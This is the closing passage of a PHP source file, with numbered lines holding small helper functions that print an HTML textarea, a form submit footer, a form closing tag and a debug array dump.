2261. !$arg['rows'] && $arg['rows'] = 25;
2262. $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2263. p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2264. }
2265.  
2266. function formfooter($name = ''){
2267. !$name && $name = 'submit';
2268. p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
2269. p('</form>');
2270. }
2271.  
2272. function formfoot(){
2273. p('</form>');
2274. }
2275.  
2276. // Exit
2277. function pr($a) {
2278. echo '<pre>';
2279. print_r($a);
2280. echo '</pre>';
2281. }
2282.  
2283. ?>